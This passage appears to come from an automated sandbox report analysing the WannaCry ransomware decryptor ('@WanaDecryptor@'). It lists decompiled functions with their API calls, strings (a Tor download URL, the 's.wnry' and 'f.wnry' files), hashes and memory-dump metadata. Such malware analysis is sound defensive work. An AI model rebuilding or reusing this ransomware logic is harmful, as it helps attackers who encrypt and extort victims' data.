                                                      				struct HWND__* _t18;
                                                      				char _t23;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14[0xc] != 0x201) {
                                                      					L5:
                                                      					 *_a8 = 0;
                                                      					return _t14;
                                                      				}
                                                      				_t23 = _t14[0x18];
                                                      				_t15 = _t14[0x1c];
                                                      				_v8 = _t15;
                                                      				_t17 = _t15 - _t23 + 1;
                                                      				_v12 = _t23;
                                                      				_push(_t17);
                                                      				L00412CEC();
                                                      				_v4 = _t17;
                                                      				if(_t17 != 0) {
                                                      					_t18 = __ecx + 0x4c0;
                                                      					if(_t18 != 0) {
                                                      						_t18 =  *(_t18 + 0x20);
                                                      					}
                                                      					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                                      					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                                      					_t14 = _v4;
                                                      					_push(_t14);
                                                      					L00412C98();
                                                      					goto L5;
                                                      				}
                                                      				return _t17;
                                                      			}

                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135B3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t30;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x8a);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                                      				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415958;
                                                      				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return __ecx;
                                                      			}

                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _t24;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413809);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t24;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x89);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                                      				L00412DA0();
                                                      				 *[fs:0x0] = _v24;
                                                      				return __ecx;
                                                      			}

                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t23;
                                                      				int _t25;
                                                      				intOrPtr _t30;
                                                      				int _t38;
                                                      				int _t41;
                                                      				intOrPtr* _t43;
                                                      				int _t45;
                                                      				intOrPtr _t47;
                                                      				struct HDC__* _t50;
                                                      				intOrPtr _t52;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041407B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t52;
                                                      				_t47 = __ecx;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                                      				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                                      				_t50 = 0;
                                                      				_v4 = 1;
                                                      				if(_t23 == 0) {
                                                      					 *((intOrPtr*)(__ecx + 8)) = 0;
                                                      					 *(__ecx + 4) = 0;
                                                      				} else {
                                                      					_t41 =  *(__ecx + 0x24);
                                                      					_t45 =  *(__ecx + 0x20);
                                                      					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                                      					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                                      					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                                      					if(__ecx != 0) {
                                                      						_t50 =  *(__ecx + 4);
                                                      					}
                                                      					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                                      					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                                      					if(_t23 != 0) {
                                                      						_t23 =  *((intOrPtr*)(_t23 + 4));
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					} else {
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					}
                                                      				}
                                                      				_t43 = _t47 + 0x10;
                                                      				_v16 = _t43;
                                                      				 *_t43 = 0x415c00;
                                                      				_v4 = 2;
                                                      				L00412D52();
                                                      				 *_t43 = 0x415bec;
                                                      				_v4 = 0xffffffff;
                                                      				L00412E3C();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				struct HDC__* _v32;
                                                      				void* _v36;
                                                      				struct tagSIZE _v48;
                                                      				void* _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				int _t21;
                                                      				void* _t22;
                                                      				intOrPtr _t41;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137C8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t41;
                                                      				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                                      				if(_t21 == 0) {
                                                      					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                                      					if(_t21 != 0) {
                                                      						_push(__ecx);
                                                      						L00412DEE();
                                                      						_t22 = __ecx + 0x48;
                                                      						_push(_t22);
                                                      						_v8 = 0;
                                                      						L00412DCA();
                                                      						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                                      						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                                      						_push(_t22);
                                                      						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                                      						L00412DCA();
                                                      						 *((char*)(__ecx + 0x5a)) = 1;
                                                      						_v32 = 0xffffffff;
                                                      						L00412DE8();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t21;
                                                      			}

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
                                                      				int _v12;
                                                      				intOrPtr _v20;
                                                      				void* _v28;
                                                      				char _v36;
                                                      				intOrPtr _v40;
                                                      				void* _v48;
                                                      				struct HWND__* _t16;
                                                      				void* _t21;
                                                      				void* _t34;
                                                      				intOrPtr _t36;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E78);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t36;
                                                      				_t34 = __ecx;
                                                      				_t16 = __ecx + 0x4c0;
                                                      				if(_t16 != 0) {
                                                      					_t16 =  *(_t16 + 0x20);
                                                      				}
                                                      				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                                      				_push(0);
                                                      				_push(_a4);
                                                      				L00412F44();
                                                      				_v12 = 0;
                                                      				_v48 =  &_v36;
                                                      				_v40 = E00406DA0;
                                                      				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
                                                      				L00412F3E();
                                                      				_t21 = E00406DC0(_t34);
                                                      				_v12 = 0xffffffff;
                                                      				L00412F38();
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t21;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				void* _v100;
                                                      				char _v196;
                                                      				void* _t14;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t22;
                                                      				void* _t23;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr _t26;
                                                      				void* _t28;
                                                      
                                                      				 *[fs:0x0] = _t26;
                                                      				E00401000( &_v196, 0);
                                                      				_t24 = __imp__time;
                                                      				_v8 = 0;
                                                      				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                                      				_t22 =  *0x4218a0; // 0x0
                                                      				_t28 = _t26 - 0xb8 + 4;
                                                      				if(_t14 - _t22 < 0x12c) {
                                                      					_v36 = 0;
                                                      				}
                                                      				_v32 = 0;
                                                      				L00412B72();
                                                      				_t16 = _v28;
                                                      				if(_t16 >= 0) {
                                                      					_t16 =  *_t24(0);
                                                      					_t28 = _t28 + 4;
                                                      					 *0x4218a0 = _t16;
                                                      				}
                                                      				 *0x4218a4 =  *0x4218a4 + 1;
                                                      				_v4 = 1;
                                                      				L00412C9E();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t16;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr* _t25;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135FF);
                                                      				_t15 =  *[fs:0x0];
                                                      				_push(_t15);
                                                      				 *[fs:0x0] = _t30;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t24 = __ecx + 0xec;
                                                      				_v16 = _t24;
                                                      				 *_t24 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t24 = 0x415bec;
                                                      				_t25 = __ecx + 0xe0;
                                                      				_v16 = _t25;
                                                      				 *_t25 = 0x415c00;
                                                      				_v4 = 5;
                                                      				L00412D52();
                                                      				 *_t25 = 0x415bec;
                                                      				_v4 = 1;
                                                      				L00412D4C();
                                                      				_v4 = 0;
                                                      				L00412D3A();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t15;
                                                      			}

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040BE90(char* _a4, char* _a8, char* _a12) {
                                                      
                                                      				strncpy("s.wnry", _a4, 0x63);
                                                      				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
                                                      				strncpy(0x4221ac, _a12, 0x63);
                                                      				return 0;
                                                      			}

                                                      APIs
                                                      Strings
                                                      • s.wnry, xrefs: 0040BE97
                                                      • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy
                                                      • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                                      • API String ID: 3301158039-3000313716
                                                      • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                                      • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				char _v1252;
                                                      				void _v2251;
                                                      				char _v2252;
                                                      				int _v2256;
                                                      				signed int _t43;
                                                      				signed char _t44;
                                                      				signed int _t52;
                                                      				signed int _t58;
                                                      				signed int _t75;
                                                      				signed int _t78;
                                                      				struct _IO_FILE* _t103;
                                                      				intOrPtr _t111;
                                                      				void* _t113;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041369B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t111;
                                                      				_t103 = fopen("f.wnry", "rt");
                                                      				_t113 = _t111 - 0x8c4 + 8;
                                                      				if(_t103 != 0) {
                                                      					E00401E90( &_v1252, __eflags);
                                                      					_v4 = 0;
                                                      					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                                      					__eflags = _t43;
                                                      					if(_t43 != 0) {
                                                      						_t44 =  *(_t103 + 0xc);
                                                      						_v2256 = 0;
                                                      						__eflags = _t44 & 0x00000010;
                                                      						if((_t44 & 0x00000010) == 0) {
                                                      							while(1) {
                                                      								_v2252 = 0;
                                                      								memset( &_v2251, 0, 0xf9 << 2);
                                                      								asm("stosw");
                                                      								asm("stosb");
                                                      								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                                      								_t113 = _t113 + 0x18;
                                                      								__eflags = _t52;
                                                      								if(_t52 == 0) {
                                                      									break;
                                                      								}
                                                      								asm("repne scasb");
                                                      								_t75 = 0xbadbac;
                                                      								__eflags = 0xbadbac;
                                                      								if(0xbadbac != 0) {
                                                      									while(1) {
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										L9:
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t78 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                                      											goto L10;
                                                      										}
                                                      										asm("repne scasb");
                                                      										__eflags =  !(_t78 | 0xffffffff) != 1;
                                                      										if( !(_t78 | 0xffffffff) != 1) {
                                                      											_t58 = E00402650( &_v1252,  &_v2252);
                                                      											__eflags = _t58;
                                                      											if(_t58 != 0) {
                                                      												_t29 =  &_v2256;
                                                      												 *_t29 = _v2256 + 1;
                                                      												__eflags =  *_t29;
                                                      											}
                                                      										}
                                                      										goto L14;
                                                      										L10:
                                                      										asm("repne scasb");
                                                      										_t75 =  !(_t78 | 0xffffffff) - 1;
                                                      										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										goto L9;
                                                      									}
                                                      								}
                                                      								L14:
                                                      								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                                      								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                                      									continue;
                                                      								}
                                                      								break;
                                                      							}
                                                      						}
                                                      						fclose(_t103);
                                                      						__eflags = _v2256;
                                                      						_t36 = _v2256 > 0;
                                                      						__eflags = _t36;
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0 | _t36;
                                                      					} else {
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						__eflags = 0;
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					 *[fs:0x0] = _v12;
                                                      					return 0;
                                                      				}
                                                      			}



















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                                      				char _v500;
                                                      				intOrPtr _v508;
                                                      				char _v520;
                                                      				char _v521;
                                                      				char _v528;
                                                      				char _v529;
                                                      				intOrPtr _v536;
                                                      				signed int _t42;
                                                      				short _t46;
                                                      				signed int _t48;
                                                      				int _t62;
                                                      				intOrPtr* _t63;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t89;
                                                      				void* _t94;
                                                      				intOrPtr* _t95;
                                                      				void* _t97;
                                                      				void* _t99;
                                                      
                                                      				_t89 = __edi;
                                                      				_t63 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t99 =  &_v508 + 8;
                                                      				_t42 = rand();
                                                      				asm("cdq");
                                                      				_t94 = 0;
                                                      				_t81 = _t42 % 0xc8 + 0x1f;
                                                      				_v508 = _t81;
                                                      				if(_t81 > 0) {
                                                      					do {
                                                      						_t62 = rand();
                                                      						_t81 = _v508;
                                                      						 *(_t99 + _t94 + 0x14) = _t62;
                                                      						_t94 = _t94 + 1;
                                                      					} while (_t94 < _t81);
                                                      				}
                                                      				_t95 = _a16;
                                                      				_t97 = _t99 + _t81 - 0xb;
                                                      				if(_t95 != 0) {
                                                      					_push(_t89);
                                                      					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                                      					_t99 = _t99 + 0xc;
